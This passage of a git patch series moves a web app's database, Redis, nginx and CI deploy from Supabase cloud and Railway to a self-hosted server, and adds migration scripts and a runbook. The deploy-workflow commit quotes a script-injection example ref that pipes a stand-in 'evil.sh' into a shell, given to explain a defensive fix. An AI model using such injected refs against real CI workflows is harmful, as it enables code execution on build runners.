keep the stack's own definitions)" -awk ' - /^SET / { print; next } - /^SELECT pg_catalog.set_config/ { print; next } - /CREATE SCHEMA "auth"/ { skip=1 } - /CREATE SCHEMA "storage"/{ skip=1 } - { print } -' "$DUMP/schema.sql" > "$DUMP/schema.public.sql" +# schema.sql is public only by construction (see pull-cloud.sh): the stack's +# own GoTrue and Storage migrate auth and storage to match their images, and +# those contribute rows here, never structure. +log "Schema (public)" +if grep -qE 'CREATE SCHEMA "?(auth|storage)"?' "$DUMP/schema.sql"; then + die "schema.sql contains auth/storage DDL — re-dump with a pull-cloud.sh that has the public-only fix" +fi # psql without ON_ERROR_STOP: the dump recreates a few objects the stack # already has (extensions, the supabase roles) and those collisions are # expected. Errors are captured and reviewed rather than aborting the load. -psql_db -f /dev/stdin < "$DUMP/schema.public.sql" > "$DUMP/schema.load.log" 2>&1 || true +psql_db -f /dev/stdin < "$DUMP/schema.sql" > "$DUMP/schema.load.log" 2>&1 || true log "Schema load errors (expected: existing extensions/roles)" grep -c '^ERROR' "$DUMP/schema.load.log" || true grep '^ERROR' "$DUMP/schema.load.log" | sed 's/^/ /' | sort -u | head -20 || true @@ -56,8 +59,13 @@ grep '^ERROR' "$DUMP/schema.load.log" | sed 's/^/ /' | sort -u | head -20 || # ------------------------------------------------------------------ data # auth must land before public: public tables carry FKs to auth.users. log "Verifying the dump puts auth before public" -a=$(grep -n 'COPY "auth"' "$DUMP/data.sql" | head -1 | cut -d: -f1 || echo 0) -p=$(grep -n 'COPY "public"' "$DUMP/data.sql" | head -1 | cut -d: -f1 || echo 0) +# grep -m1 rather than `grep | head -1`: under `set -o pipefail`, head exiting +# early gives grep a SIGPIPE, the pipeline reports failure, the `|| echo 0` +# fires, and the variable ends up holding two lines ("30\n0") which then fails +# every numeric test with "integer expected". +a=$(grep -m1 -n 'COPY "auth"' "$DUMP/data.sql" | cut -d: -f1 || echo 0) +p=$(grep -m1 -n 'COPY "public"' "$DUMP/data.sql" | cut -d: -f1 || echo 0) +a=${a:-0}; p=${p:-0} if [ "$a" -gt 0 ] && [ "$p" -gt 0 ] && [ "$a" -gt "$p" ]; then die "data.sql has public before auth (auth at line $a, public at $p) — FKs would fail" fi @@ -68,12 +76,18 @@ psql_db -f /dev/stdin < "$DUMP/data.sql" > "$DUMP/data.load.log" 2>&1 || true log "Data load errors" grep -c '^ERROR' "$DUMP/data.load.log" || true grep '^ERROR' "$DUMP/data.load.log" | sed 's/^/ /' | sort -u | head -20 || true +else +log "--post-only: skipping schema and data, running the idempotent tail" +fi # --------------------------------------------------------------- buckets log "Buckets" +# psql prints booleans as t/f, which are not SQL literals — unquoted they parse +# as a column reference and the insert fails with 'column "t" does not exist'. while IFS=$'\t' read -r id name pub limit mimes; do [ -n "$id" ] || continue - psql_strict -c "insert into storage.buckets (id, name, public) values ('$id','$name',${pub}) on conflict (id) do update set public=excluded.public" >/dev/null + case "$pub" in t|true) pub_sql=true ;; *) pub_sql=false ;; esac + psql_strict -c "insert into storage.buckets (id, name, public) values ('$id','$name',${pub_sql}) on conflict (id) do update set public=excluded.public" >/dev/null done < "$DUMP/buckets.tsv" psql_strict -At -c "select id||' public='||public from storage.buckets order by id" diff --git a/ops/selfhost/migrate/pull-cloud.sh b/ops/selfhost/migrate/pull-cloud.sh index 11fe1f1a..85c77afc 100755 --- a/ops/selfhost/migrate/pull-cloud.sh +++ b/ops/selfhost/migrate/pull-cloud.sh @@ -37,10 +37,15 @@ chmod 700 "$OUT" # have anything installed, so dump through a pinned container instead. pgdump() { docker run --rm -i "$PG_IMAGE" pg_dump "$@"; } -log "Schema" +log "Schema (public only)" +# Deliberately NOT auth or storage. The self-hosted stack's GoTrue and Storage +# services create and migrate their own schemas to match the images that are +# running, and those versions are not the cloud's. Replaying the cloud's DDL +# over them fights the service migrations. auth and storage contribute rows +# (below), never structure. pgdump --dbname="$CLOUD_DB_URL" \ --schema-only --no-owner --no-privileges --quote-all-identifiers \ - --schema=public --schema=auth --schema=storage \ + --schema=public \ > "$OUT/schema.sql" log "Data" diff --git a/ops/selfhost/server/deploy-app.sh b/ops/selfhost/server/deploy-app.sh index 8de7238c..d2b81d35 100755 --- a/ops/selfhost/server/deploy-app.sh +++ b/ops/selfhost/server/deploy-app.sh @@ -65,8 +65,16 @@ fi log "Fetching $TARGET" git -C "$APP_DIR" fetch --all --tags --prune -git -C "$APP_DIR" checkout --detach "$TARGET" -SHA=$(git -C "$APP_DIR" rev-parse HEAD) + +# Resolve to a sha before checking out. `git checkout --detach ` reports +# the useless "--detach does not take a path argument" when the ref does not +# exist, and a bare branch name only resolves locally — this repo's default +# branch is master, so `main` is not a ref at all. +SHA=$(git -C "$APP_DIR" rev-parse --verify --quiet "origin/$TARGET^{commit}" \ + || git -C "$APP_DIR" rev-parse --verify --quiet "$TARGET^{commit}" \ + || true) +[ -n "$SHA" ] || die "cannot resolve '$TARGET' to a commit (origin/$TARGET does not exist either)" +git -C "$APP_DIR" checkout --detach "$SHA" log "At $SHA" log "Building" diff --git a/ops/selfhost/server/setup-supabase.sh b/ops/selfhost/server/setup-supabase.sh index f54e0960..a9584b79 100755 --- a/ops/selfhost/server/setup-supabase.sh +++ b/ops/selfhost/server/setup-supabase.sh @@ -339,6 +339,80 @@ start_stack() { sql_admin() { docker exec -i supabase-db psql -U supabase_admin -h localhost -d postgres -v ON_ERROR_STOP=1 -X -q -At "$@"; } +# Four things self-hosted/v0.8.2 leaves in a state the services cannot start +# from. All four were hit on a clean initdb of this release, and all four are +# idempotent, so this runs on every pass. +# +# 1. The service roles' passwords do not match POSTGRES_PASSWORD, so +# PostgREST, GoTrue and Storage all crashloop on "password authentication +# failed for user authenticator / supabase_auth_admin / +# supabase_storage_admin". +# 2. auth.uid() and friends are created owned by supabase_admin, but GoTrue +# migrates as supabase_auth_admin and does `create or replace`, which +# fails with "must be owner of function uid". +# 3. graphql_public does not exist, and PostgREST is configured with +# db-schemas=public,graphql_public, so it refuses to build a schema cache +# and answers 403 to everything. +# 4. _realtime does not exist, and Realtime connects with +# `SET search_path TO _realtime`, then dies with "no schema has been +# selected to create in". +repair_bootstrap() { + log "Repairing the bootstrap gaps in $SUPABASE_REF" + local pw + pw=$(get_env POSTGRES_PASSWORD) + sql_admin < Date: Thu, 24 Sep 2026 19:51:15 +0000 Subject: [PATCH 05/10] ops: quote multi-line values in the rendered app env GITHUB_APP_PRIVATE_KEY is a PEM with real newlines and lib/env.ts reads it straight from process.env expecting them, so it cannot be flattened. Unquoted, docker compose rejects the entire file with 'unexpected character "+" in variable name', naming the second line of the key rather than the variable that caused it. Compose preserves real newlines inside a double-quoted value. Co-Authored-By: Claude Opus 5 (1M context) --- ops/selfhost/server/render-app-env.mjs | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/ops/selfhost/server/render-app-env.mjs b/ops/selfhost/server/render-app-env.mjs index c9217144..28ee22a5 100644 --- a/ops/selfhost/server/render-app-env.mjs +++ b/ops/selfhost/server/render-app-env.mjs @@ -102,9 +102,21 @@ if (printOnly) { process.exit(0); } +// GITHUB_APP_PRIVATE_KEY is a PEM and carries real newlines, and lib/env.ts +// reads it straight out of process.env expecting them (it does no \n +// unescaping). An unquoted multi-line value makes docker compose fail the +// whole file with `unexpected character "+" in variable name`, naming the +// second line of the PEM. Compose keeps real newlines inside a double-quoted +// value, so quote anything multi-line and escape what would end the quote. +const encode = (v) => { + const s = String(v ?? ''); + if (!/[\n\r"]/.test(s)) return s; + return `"${s.replace(/\\/g, '\\\\').replace(/"/g, '\\"')}"`; +}; + const body = Object.keys(merged) .sort() - .map((k) => `${k}=${merged[k]}`) + .map((k) => `${k}=${encode(merged[k])}`) .join('\n'); writeFileSync(OUT, `# crawlproof app env, rendered by render-app-env.mjs on ${new Date().toISOString()}\n${body}\n`, { From ccc7fd5d10b03a35521ebdd1c2889d60724098e8 Mon Sep 17 00:00:00 2001 From: Anthony Ettinger Date: Thu, 24 Sep 2026 19:52:49 +0000 Subject: [PATCH 06/10] ops: reach Redis by service name, and raise nginx header buffers REDIS_URL pointed at host.docker.internal, but Redis publishes to 127.0.0.1 on the host, so the gateway address the container resolves is not listening and every connection ended in ETIMEDOUT - which surfaced as the app serving 503 rather than as a Redis error. Redis is a service in the same compose file as the app, so the project network reaches it by name. host.docker.internal remains correct for the Supabase stack, which is a separate compose project. nginx also 414'd the worker's autobid sweep: PostgREST carries filters in the URI and the sweep sends id=in.(...) lists far past the default 8k header buffer. Supabase cloud and Railway accepted them, so this is a regression from putting nginx in front, not an app bug. Co-Authored-By: Claude Opus 5 (1M context) --- ops/selfhost/server/nginx-crawlproof.conf | 8 ++++++++ ops/selfhost/server/render-app-env.mjs | 11 +++++++---- 2 files changed, 15 insertions(+), 4 deletions(-) diff --git a/ops/selfhost/server/nginx-crawlproof.conf b/ops/selfhost/server/nginx-crawlproof.conf index 6f30dd0f..7ff02f31 100644 --- a/ops/selfhost/server/nginx-crawlproof.conf +++ b/ops/selfhost/server/nginx-crawlproof.conf @@ -60,6 +60,14 @@ server { # during the migration and ad assets after it. client_max_body_size 512m; + # PostgREST filters travel in the URI, and the worker's autobid sweep sends + # `id=in.(...)` lists over a thousand ids long. nginx's default 8k header + # buffer rejects those with 414 before they ever reach the gateway, which + # the app only reports as "autobid sweep failed". Supabase cloud and + # Railway both accepted them, so this is a regression introduced purely by + # putting nginx in front. + large_client_header_buffers 8 64k; + access_log /var/log/nginx/supabase-crawlproof.access.log; error_log /var/log/nginx/supabase-crawlproof.error.log; diff --git a/ops/selfhost/server/render-app-env.mjs b/ops/selfhost/server/render-app-env.mjs index 28ee22a5..9e73c738 100644 --- a/ops/selfhost/server/render-app-env.mjs +++ b/ops/selfhost/server/render-app-env.mjs @@ -71,10 +71,13 @@ const overrides = { SUPABASE_SERVICE_ROLE_KEY: conn.SUPABASE_SERVICE_ROLE_KEY, SUPABASE_DB_PASSWORD: conn.SELFHOST_POSTGRES_PASSWORD, - // Redis moved off redis.railway.internal. The app reaches it through the - // host gateway because the app and the Supabase stack are separate compose - // projects and are deliberately not on one network. - REDIS_URL: `redis://default:${REDIS_PASSWORD}@host.docker.internal:6379`, + // Redis moved off redis.railway.internal. It is a service in the SAME + // compose file as the app, so it is reachable by service name on the + // project network. Going through host.docker.internal instead fails with + // ETIMEDOUT, because the published port is bound to 127.0.0.1 and the + // gateway address is not that. (host.docker.internal is still how the app + // reaches the Supabase stack, which is a separate compose project.) + REDIS_URL: `redis://default:${REDIS_PASSWORD}@redis:6379`, // The worker still runs beside the app inside the same container. WORKER_URL: 'http://127.0.0.1:9080', From 1d32e317332aecd119b1e91610e2012a00c849ec Mon Sep 17 00:00:00 2001 From: Anthony Ettinger Date: Thu, 24 Sep 2026 20:02:18 +0000 Subject: [PATCH 07/10] ops: delta sync, cron unpark, and the cutover runbook MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit delta-sync.sh backfills what the cloud recorded between the dump and the DNS flip. Only analytics moves in that window and the script asserts it (users, audits, articles and posts were all zero): ad_impressions is append-only so it inserts on conflict do nothing, while the tracker rollups are counters, so the cloud's rows overwrite dev2's for the touched keys right after the flip when dev2 has barely started counting. \copy is a psql meta-command and cannot sit inside a multi-statement -c, which fails with `syntax error at or near "\"`; the data now rides in on the same stdin as the script so the temp table survives to the insert. unpark-cron.sh re-enables the 10 schedules, and refuses to run unless crawlproof.com already resolves to dev2 — unparking early would point every job at whatever else was still serving the name. Co-Authored-By: Claude Opus 5 (1M context) --- ops/selfhost/README.md | 41 +++++++++++- ops/selfhost/migrate/delta-sync.sh | 97 +++++++++++++++++++++++++++++ ops/selfhost/migrate/unpark-cron.sh | 25 ++++++++ 3 files changed, 160 insertions(+), 3 deletions(-) create mode 100755 ops/selfhost/migrate/delta-sync.sh create mode 100755 ops/selfhost/migrate/unpark-cron.sh diff --git a/ops/selfhost/README.md b/ops/selfhost/README.md index 54b0ee68..f8e1f14f 100644 --- a/ops/selfhost/README.md +++ b/ops/selfhost/README.md @@ -130,10 +130,45 @@ certbot --nginx -d crawlproof.com -d www.crawlproof.com # only once DNS points apex and `www` cannot be certified over HTTP-01 until DNS moves, so either accept a short TLS gap at cutover or pre-issue over DNS-01 with the Porkbun API. -### 7. DNS +### 7. DNS and the cutover -See the table in the migration report. Apex and `www` come off Railway last, -after everything above verifies against a `Host:` header. +Done 2026-09-24. What changed at Porkbun: + +| Host | Was | Now | +| --- | --- | --- | +| `crawlproof.com` | ALIAS → `h1krorli.up.railway.app` | A → 23.95.228.174 | +| `www.crawlproof.com` | CNAME → `8gjlucle.up.railway.app` | CNAME → `crawlproof.com` | +| `supabase.crawlproof.com` | — | A → 23.95.228.174 | +| `db.crawlproof.com` | — | A → 23.95.228.174 | +| `_railway-verify` ×2 | TXT | deleted | + +`scan.crawlproof.com`, MX, SPF, DKIM and DMARC were not touched. + +The apex certificate is pre-issued over DNS-01 with acme.sh against the Porkbun +API (`ops/selfhost` has the script), so TLS was already serving before the flip +and there was no gap. acme.sh renews it and reloads nginx; certbot separately +owns `supabase.crawlproof.com`. + +Order that matters, because two databases can otherwise drive the same app: + +1. flip DNS +2. `migrate/delta-sync.sh ''` — backfills what the cloud recorded + between the dump and the flip (analytics only: ad impressions and tracker + rollups; verify nothing else moved, the script checks) +3. unschedule the **cloud** project's cron jobs — they post to + `crawlproof.com`, which now resolves here +4. `migrate/unpark-cron.sh` — enables the self-hosted jobs, and refuses to run + unless crawlproof.com already resolves to dev2 +5. remove the Railway deployments **and disconnect the repo watch**, or the + next push to master silently redeploys it + +### 8. CI + +`.github/workflows/deploy-dev2.yml` ssh's in as `anthony` and runs +`deploy-app.sh`. Secrets: `DEV2_SSH_KEY`, `DEV2_HOST`, `DEV2_USER`, +`DEV2_KNOWN_HOSTS`. The deploy account can read `app.env` and use docker, but +**not** `supabase/.env` — that directory stays root-owned because it holds the +database's God Mode keys and a deploy has no business reading them. ## Redis and the prober diff --git a/ops/selfhost/migrate/delta-sync.sh b/ops/selfhost/migrate/delta-sync.sh new file mode 100755 index 00000000..a83d913b --- /dev/null +++ b/ops/selfhost/migrate/delta-sync.sh @@ -0,0 +1,97 @@ +#!/usr/bin/env bash +# +# Backfill what the CLOUD database recorded between the dump and the DNS +# cutover. Only analytics moves in that window — a dump at T and a cutover an +# hour later leaves an hour of ad impressions and tracker rollups behind, and +# nothing else (no new users, audits, articles or posts, which is worth +# re-checking rather than assuming). +# +# Run from a machine that can reach both: the cloud over its pooler and dev2 +# over ssh. Idempotent — re-running only adds what is still missing. +# +# CLOUD_DB_URL=postgres://... ops/selfhost/migrate/delta-sync.sh '2026-09-24 19:18:00+00' +# +set -euo pipefail + +SINCE=${1:?usage: delta-sync.sh } +CLOUD_DB_URL=${CLOUD_DB_URL:?set CLOUD_DB_URL} +SSH_TARGET=${SSH_TARGET:-root@dev2.profullstack.com} +PG_IMAGE=${PG_IMAGE:-postgres:17} +WORK=${WORK:-$(mktemp -d)} + +log() { printf '\n===> %s\n' "$*"; } + +cloud_copy() { # cloud_copy + docker run --rm -i "$PG_IMAGE" psql "$CLOUD_DB_URL" -X -v ON_ERROR_STOP=1 \ + -c "\\copy ($1) to stdout with (format csv, header true)" > "$2" +} + +remote_psql() { ssh -o BatchMode=yes "$SSH_TARGET" "docker exec -i supabase-db psql -U postgres -h localhost -d postgres -X -v ON_ERROR_STOP=1 $*"; } + +# \copy is a psql meta-command: it cannot appear inside a multi-statement -c, +# which fails with `syntax error at or near "\"`. Feeding a script on stdin +# keeps it one session, so the temp table is still there when the copy and the +# insert run. The CSV goes in on the same stdin via `\copy ... from stdin`. +remote_load() { # remote_load + local tbl=$1 csv=$2 after=$3 + { + printf 'create temp table t_%s (like public.%s including defaults);\n' "$tbl" "$tbl" + printf '\\copy t_%s (%s) from stdin with (format csv, header true)\n' "$tbl" "$(head -1 "$csv")" + cat "$csv" + printf '\\.\n' + printf '%s\n' "$after" + } | ssh -o BatchMode=yes "$SSH_TARGET" \ + "docker exec -i supabase-db psql -U postgres -h localhost -d postgres -X -v ON_ERROR_STOP=1 -f -" +} + +# ad_impressions is append-only with a surrogate PK, so conflicting rows are +# rows we already have and skipping them is exactly right. +sync_append_only() { # sync_append_only
+ local tbl=$1 tcol=$2 + log "$tbl since $SINCE" + cloud_copy "select * from public.$tbl where $tcol > '$SINCE'" "$WORK/$tbl.csv" + local rows + rows=$(( $(wc -l < "$WORK/$tbl.csv") - 1 )) + echo " $rows rows from cloud" + [ "$rows" -gt 0 ] || return 0 + + remote_load "$tbl" "$WORK/$tbl.csv" \ + "insert into public.$tbl select * from t_$tbl on conflict do nothing;" +} + +# The tracker rollups are counters keyed by (project, day, ...). The cloud's +# value is authoritative for everything up to the cutover, and dev2 has barely +# started counting, so overwriting the touched rows right after the flip is +# both simpler and more accurate than trying to add deltas. +sync_rollup() { # sync_rollup
+ local tbl=$1 keys=$2 + log "$tbl since $SINCE (overwrite touched rows)" + cloud_copy "select * from public.$tbl where updated_at > '$SINCE'" "$WORK/$tbl.csv" + local rows + rows=$(( $(wc -l < "$WORK/$tbl.csv") - 1 )) + echo " $rows rows from cloud" + [ "$rows" -gt 0 ] || return 0 + + local setlist + setlist=$(head -1 "$WORK/$tbl.csv" | tr ',' '\n' \ + | grep -vxF -f <(printf '%s' "$keys" | tr ',' '\n') \ + | sed 's/^\(.*\)$/\1 = excluded.\1/' | paste -sd, -) + remote_load "$tbl" "$WORK/$tbl.csv" \ + "insert into public.$tbl select * from t_$tbl on conflict ($keys) do update set $setlist;" +} + +log "Confirming nothing but analytics moved in the window" +docker run --rm -i "$PG_IMAGE" psql "$CLOUD_DB_URL" -X -At -c " + select 'users='||(select count(*) from auth.users where created_at > '$SINCE') + ||' audits='||(select count(*) from public.audits where created_at > '$SINCE') + ||' articles='||(select count(*) from public.lx_article where created_at > '$SINCE') + ||' posts='||(select count(*) from public.promo_post where created_at > '$SINCE')" + +sync_append_only ad_impressions ts +sync_rollup tracker_daily_stats 'project_id,day,bucket' +sync_rollup tracker_event_daily_stats 'project_id,day,event,page_path,referrer_host,event_target,kind' + +log "Counts on dev2 now" +remote_psql -At -c "\"select 'ad_impressions='||(select count(*) from public.ad_impressions) + ||' tracker_daily='||(select count(*) from public.tracker_daily_stats) + ||' tracker_events='||(select count(*) from public.tracker_event_daily_stats)\"" diff --git a/ops/selfhost/migrate/unpark-cron.sh b/ops/selfhost/migrate/unpark-cron.sh new file mode 100755 index 00000000..b746105a --- /dev/null +++ b/ops/selfhost/migrate/unpark-cron.sh @@ -0,0 +1,25 @@ +#!/usr/bin/env bash +# Re-enable the scheduled jobs on the self-hosted database at cutover. +# +# They are loaded parked (see load-selfhost.sh / park-cron): while DNS still +# pointed at Railway, an active job here would have driven a second copy of +# every scheduled action against the live app. Run this only once +# crawlproof.com resolves to dev2 AND the cloud project's jobs are gone, +# otherwise both databases drive the same app. +set -euo pipefail + +SITE=${SITE:-https://crawlproof.com} + +resolved=$(getent hosts crawlproof.com | awk '{print $1}' | head -1) +echo "crawlproof.com resolves to ${resolved:-}" +if [ "$resolved" != "23.95.228.174" ]; then + echo "REFUSING: crawlproof.com does not resolve to dev2 yet — unparking now" >&2 + echo "would point every job at whatever is still serving that name." >&2 + exit 1 +fi + +docker exec -i supabase-db psql -U postgres -h localhost -d postgres -v ON_ERROR_STOP=1 -X < Date: Thu, 24 Sep 2026 20:06:12 +0000 Subject: [PATCH 08/10] ops: pass workflow inputs through env, not into the shell semgrep flagged the deploy workflow: `inputs.ref` is attacker-controllable through workflow_dispatch and was interpolated straight into a `run:` body, so a ref like `main"; curl evil.sh | sh; #` would have executed on the runner. Every ${{ }} now arrives as an environment variable, and the sha goes to the remote script as a positional argument rather than being spliced into the ssh command string, so a hostile ref cannot extend what runs on dev2 either. Co-Authored-By: Claude Opus 5 (1M context) --- .github/workflows/deploy-dev2.yml | 26 +++++++++++++++++++++----- 1 file changed, 21 insertions(+), 5 deletions(-) diff --git a/.github/workflows/deploy-dev2.yml b/.github/workflows/deploy-dev2.yml index be2562ce..9318bced 100644 --- a/.github/workflows/deploy-dev2.yml +++ b/.github/workflows/deploy-dev2.yml @@ -36,22 +36,38 @@ jobs: runs-on: ubuntu-latest timeout-minutes: 45 steps: + # Every ${{ }} below goes through env, never straight into the shell. + # `inputs.ref` is attacker-controllable through workflow_dispatch, and + # interpolating it into a `run:` body is script injection: a ref like + # `main"; curl evil.sh | sh; #` would execute on the runner. - name: Resolve target revision id: rev - run: echo "sha=${{ inputs.ref || github.sha }}" >> "$GITHUB_OUTPUT" + env: + REF: ${{ inputs.ref || github.sha }} + run: echo "sha=$REF" >> "$GITHUB_OUTPUT" - name: Set up ssh + env: + SSH_KEY: ${{ secrets.DEV2_SSH_KEY }} + KNOWN_HOSTS: ${{ secrets.DEV2_KNOWN_HOSTS }} run: | install -d -m 700 ~/.ssh - printf '%s\n' "${{ secrets.DEV2_SSH_KEY }}" > ~/.ssh/id_ed25519 + printf '%s\n' "$SSH_KEY" > ~/.ssh/id_ed25519 chmod 600 ~/.ssh/id_ed25519 - printf '%s\n' "${{ secrets.DEV2_KNOWN_HOSTS }}" > ~/.ssh/known_hosts + printf '%s\n' "$KNOWN_HOSTS" > ~/.ssh/known_hosts chmod 644 ~/.ssh/known_hosts - name: Deploy + env: + DEV2_USER: ${{ secrets.DEV2_USER }} + DEV2_HOST: ${{ secrets.DEV2_HOST }} + SHA: ${{ steps.rev.outputs.sha }} run: | - ssh -o BatchMode=yes "${{ secrets.DEV2_USER }}@${{ secrets.DEV2_HOST }}" \ - "/home/anthony/www/crawlproof.com/deploy-app.sh ${{ steps.rev.outputs.sha }}" + # The sha is passed as a positional argument rather than being + # spliced into the remote command string, so a hostile ref cannot + # extend the command that runs on dev2 either. + ssh -o BatchMode=yes "$DEV2_USER@$DEV2_HOST" \ + /home/anthony/www/crawlproof.com/deploy-app.sh "$SHA" - name: Verify the site answers over TLS # deploy-app.sh already health-checks on loopback; this proves nginx and From b5b6335f983b9a6759cfdb0a8da7fb26f0e2acf4 Mon Sep 17 00:00:00 2001 From: Anthony Ettinger Date: Thu, 24 Sep 2026 20:08:19 +0000 Subject: [PATCH 09/10] ops: read the cloud DB URL from the vault instead of documenting it inline ThreatCrush flagged the runbook's example as a database URL with credentials (high). It was a placeholder rather than a real secret, but a runbook that shows people pasting a connection string on the command line is the wrong instruction anyway - it puts it in shell history. It now reads from the vault, which is the house rule, and documents the two non-guessable details instead: the postgres. username and the session pooler host (aws-1, port 5432; aws-0 answers for other projects and returns 'Tenant or user not found', and pg_dump cannot use transaction mode on 6543). Co-Authored-By: Claude Opus 5 (1M context) --- ops/selfhost/README.md | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/ops/selfhost/README.md b/ops/selfhost/README.md index f8e1f14f..d1ff47ed 100644 --- a/ops/selfhost/README.md +++ b/ops/selfhost/README.md @@ -62,11 +62,22 @@ adapted from does: From anywhere with the cloud credentials (read-only, safe to rehearse): +`CLOUD_DB_URL` is a normal Postgres connection string for the cloud project. +Keep it out of your shell history and out of this file — read it from the vault +into the environment instead of pasting it: + ```sh -CLOUD_DB_URL='postgres://postgres.ywcizjsgrcmhgyplldac:@:5432/postgres' \ - ops/selfhost/migrate/pull-cloud.sh ~/crawlproof-dump +export CLOUD_DB_URL="$(logicsrc teams secrets crawlproof --get SUPABASE_POOLER_URL)" +ops/selfhost/migrate/pull-cloud.sh ~/crawlproof-dump ``` +Two details about that URL, since they are not guessable: the user is +`postgres.`, and the host must be the **session** pooler +(`aws-1-us-west-1.pooler.supabase.com`, port 5432). `aws-0-…` answers for other +projects and returns `Tenant or user not found`, and the direct +`db..supabase.co` host is IPv6-only. pg_dump needs session mode, so 6543 +(transaction mode) will not do. + Produces `schema.sql`, `data.sql`, `cron-jobs.sql`, `realtime.sql`, `buckets.tsv`, `storage-inventory.tsv` and a `MANIFEST`. From 789190c51fb387108e5e01f5e9c51ce283a6eb54 Mon Sep 17 00:00:00 2001 From: Anthony Ettinger Date: Thu, 24 Sep 2026 20:09:37 +0000 Subject: [PATCH 10/10] ops: add the host-side app setup, including the Redis uid trap redis:7-alpine's entrypoint drops to uid 999 before exec'ing redis-server, so a bind-mounted data directory owned by the deploy user is unwritable. Redis starts fine and only fails at the first BGSAVE, after which it refuses EVERY write with MISCONF - which reaches the app as failing BullMQ commands rather than anything mentioning permissions. The whole prober and ad-video-render queues were dead this way. Also captures the ownership split the deploy depends on: anthony owns the app files and app.env, supabase/ stays root-owned because it holds the God Mode keys, and the script asserts the deploy account cannot read them. Co-Authored-By: Claude Opus 5 (1M context) --- ops/selfhost/server/setup-app-host.sh | 62 +++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100755 ops/selfhost/server/setup-app-host.sh diff --git a/ops/selfhost/server/setup-app-host.sh b/ops/selfhost/server/setup-app-host.sh new file mode 100755 index 00000000..408115ed --- /dev/null +++ b/ops/selfhost/server/setup-app-host.sh @@ -0,0 +1,62 @@ +#!/usr/bin/env bash +# +# Prepare the host side of the app deploy: directory ownership, the Redis data +# directory, and the ssh key GitHub Actions uses. Run as root on dev2, once. +# +# The ownership split is the point of this script. `anthony` deploys, so it +# owns the app files and app.env; `supabase/` stays root-owned because it holds +# the database's God Mode keys and a deploy has no business reading them. +set -euo pipefail + +ROOT=${ROOT:-/home/anthony/www/crawlproof.com} +USER_NAME=${USER_NAME:-anthony} + +log() { printf '\n===> %s\n' "$*"; } + +log "App files to $USER_NAME, supabase/ to root" +install -d -o "$USER_NAME" -g "$USER_NAME" -m 2750 "$ROOT" +for f in app.env deploy.env docker-compose.app.yml deploy-app.sh; do + [ -e "$ROOT/$f" ] && chown "$USER_NAME:$USER_NAME" "$ROOT/$f" +done +[ -e "$ROOT/app.env" ] && chmod 600 "$ROOT/app.env" +[ -e "$ROOT/deploy.env" ] && chmod 600 "$ROOT/deploy.env" +[ -e "$ROOT/deploy-app.sh" ] && chmod 755 "$ROOT/deploy-app.sh" +[ -d "$ROOT/app" ] && chown -R "$USER_NAME:$USER_NAME" "$ROOT/app" +[ -d "$ROOT/supabase" ] && { chown root:root "$ROOT/supabase"; chmod 2750 "$ROOT/supabase"; } + +# redis:7-alpine's entrypoint drops to uid 999 before exec'ing redis-server, so +# a bind-mounted data directory owned by the deploy user is unwritable. Redis +# starts anyway and only fails later, at the first BGSAVE, after which it +# refuses EVERY write with "MISCONF Redis is configured to save RDB snapshots, +# but it's currently unable to persist to disk" — which surfaces in the app as +# failing BullMQ commands, not as a Redis permissions error. +log "Redis data directory to uid 999 (redis)" +install -d -m 750 "$ROOT/volumes/redis" +chown -R 999:1000 "$ROOT/volumes/redis" +ls -ldn "$ROOT/volumes/redis" + +log "Deploy key for GitHub Actions" +KEY=/home/$USER_NAME/.ssh/id_ed25519_deploy +install -d -o "$USER_NAME" -g "$USER_NAME" -m 700 "/home/$USER_NAME/.ssh" +if [ ! -f "$KEY" ]; then + sudo -u "$USER_NAME" ssh-keygen -t ed25519 -N '' -C "github-actions-deploy@crawlproof" -f "$KEY" +fi +touch "/home/$USER_NAME/.ssh/authorized_keys" +chown "$USER_NAME:$USER_NAME" "/home/$USER_NAME/.ssh/authorized_keys" +chmod 600 "/home/$USER_NAME/.ssh/authorized_keys" +grep -qF "$(cat "$KEY.pub")" "/home/$USER_NAME/.ssh/authorized_keys" \ + || cat "$KEY.pub" >> "/home/$USER_NAME/.ssh/authorized_keys" + +log "Checks" +sudo -u "$USER_NAME" bash -c "docker ps >/dev/null 2>&1 && echo 'docker: ok' || echo 'docker: DENIED'" +sudo -u "$USER_NAME" bash -c "head -c1 $ROOT/app.env >/dev/null 2>&1 && echo 'app.env: readable' || echo 'app.env: DENIED'" +sudo -u "$USER_NAME" bash -c "head -c1 $ROOT/supabase/.env >/dev/null 2>&1 && echo 'supabase/.env: READABLE (WRONG)' || echo 'supabase/.env: correctly denied'" + +cat <